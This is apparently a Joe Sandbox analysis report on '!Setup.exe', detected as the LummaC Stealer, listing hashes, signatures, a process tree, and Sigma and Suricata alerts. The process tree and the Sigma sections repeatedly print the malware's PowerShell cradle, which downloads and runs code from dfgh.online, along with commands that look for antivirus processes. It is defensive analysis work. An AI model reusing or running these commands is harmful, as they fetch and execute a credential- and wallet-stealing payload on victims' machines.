Edit tour

Windows Analysis Report
!Setup.exe

Overview

General Information

Sample name:	!Setup.exe
Analysis ID:	1581467
MD5:	0981c44a10cc0831ff1223aa55383192
SHA1:	fc3f705cceb24d3265fe136707e1a4e497214975
SHA256:	14fbe2e9baff12e805e814228425975d57bbbeb16a2b3a1229c873871d97d803
Tags:	exeuser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Drops PE files with a suspicious file extension

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

!Setup.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\!Setup.exe" MD5: 0981C44A10CC0831FF1223AA55383192)

cmd.exe (PID: 6608 cmdline: "C:\Windows\System32\cmd.exe" /c move Hawaii Hawaii.cmd & Hawaii.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6604 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6472 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1020 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 892 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6284 cmdline: cmd /c md 243714 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 1848 cmdline: extrac32 /Y /E Applied MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 6476 cmdline: findstr /V "surround" Somehow MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1276 cmdline: cmd /c copy /b ..\Directors + ..\Tongue + ..\Banks + ..\Convenient + ..\Mainland + ..\Abilities + ..\Mainstream L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Publisher.com (PID: 6548 cmdline: Publisher.com L MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 2412 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

9G18T8ZC0J1TEEA21J35VVJ53B.exe (PID: 3872 cmdline: "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" MD5: 34B63F16F994365A2FC9263E87CD28E8)

9G18T8ZC0J1TEEA21J35VVJ53B.tmp (PID: 5948 cmdline: "C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$40472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" MD5: A62041070E18901131CBBE7825EC4EC7)

9G18T8ZC0J1TEEA21J35VVJ53B.exe (PID: 5448 cmdline: "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT MD5: 34B63F16F994365A2FC9263E87CD28E8)

9G18T8ZC0J1TEEA21J35VVJ53B.tmp (PID: 5732 cmdline: "C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$50472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT MD5: A62041070E18901131CBBE7825EC4EC7)

timeout.exe (PID: 4724 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)

conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3092 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2472 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5036 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5988 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5828 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 4824 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 6556 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1172 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 2380 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5420 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2360 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 1400 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5952 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6820 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6816 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5136 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1732 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6400 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

vsv_tool.exe (PID: 7124 cmdline: "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe" MD5: C12ED31F29EF510393AE36661F44F102)

choice.exe (PID: 6352 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Publisher.com L, ParentImage: C:\Users\user\AppData\Local\Temp\243714\Publisher.com, ParentProcessId: 6548, ParentProcessName: Publisher.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2412, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Publisher.com L, ParentImage: C:\Users\user\AppData\Local\Temp\243714\Publisher.com, ParentProcessId: 6548, ParentProcessName: Publisher.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2412, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Publisher.com L, ParentImage: C:\Users\user\AppData\Local\Temp\243714\Publisher.com, ParentProcessId: 6548, ParentProcessName: Publisher.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2412, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Publisher.com L, ParentImage: C:\Users\user\AppData\Local\Temp\243714\Publisher.com, ParentProcessId: 6548, ParentProcessName: Publisher.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2412, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Publisher.com L, ParentImage: C:\Users\user\AppData\Local\Temp\243714\Publisher.com, ParentProcessId: 6548, ParentProcessName: Publisher.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2412, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hawaii Hawaii.cmd & Hawaii.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6608, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 892, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T20:24:36.226362+0100	2028371	3	Unknown Traffic	192.168.2.5	49744	104.21.89.250	443	TCP
2024-12-27T20:24:38.320448+0100	2028371	3	Unknown Traffic	192.168.2.5	49750	104.21.89.250	443	TCP
2024-12-27T20:24:41.100799+0100	2028371	3	Unknown Traffic	192.168.2.5	49756	104.21.89.250	443	TCP
2024-12-27T20:24:44.260408+0100	2028371	3	Unknown Traffic	192.168.2.5	49763	104.21.89.250	443	TCP
2024-12-27T20:24:46.485474+0100	2028371	3	Unknown Traffic	192.168.2.5	49769	104.21.89.250	443	TCP
2024-12-27T20:24:49.206242+0100	2028371	3	Unknown Traffic	192.168.2.5	49777	104.21.89.250	443	TCP
2024-12-27T20:24:51.308770+0100	2028371	3	Unknown Traffic	192.168.2.5	49782	104.21.89.250	443	TCP
2024-12-27T20:24:53.591356+0100	2028371	3	Unknown Traffic	192.168.2.5	49788	104.21.89.250	443	TCP
2024-12-27T20:24:57.220753+0100	2028371	3	Unknown Traffic	192.168.2.5	49798	104.21.89.250	443	TCP
2024-12-27T20:24:59.547532+0100	2028371	3	Unknown Traffic	192.168.2.5	49803	185.161.251.21	443	TCP
2024-12-27T20:25:01.484303+0100	2028371	3	Unknown Traffic	192.168.2.5	49810	104.21.37.128	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T20:24:37.000398+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49744	104.21.89.250	443	TCP
2024-12-27T20:24:39.151502+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49750	104.21.89.250	443	TCP
2024-12-27T20:24:58.003960+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49798	104.21.89.250	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T20:24:37.000398+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49744	104.21.89.250	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T20:24:39.151502+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49750	104.21.89.250	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T20:25:02.379126+0100	2008438	1	A Network Trojan was detected	104.21.37.128	443	192.168.2.5	49810	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T20:24:53.595116+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49788	104.21.89.250	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/8574262446/ph.txt

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe

ReversingLabs: Detection: 15%

Source: !Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49810 version: TLS 1.2

Source: !Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2651074303.0000000007119000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\243714\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\243714	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49798 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49744 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49744 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49788 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49750 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49750 -> 104.21.89.250:443

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49763 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49803 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49769 -> 104.21.89.250:443
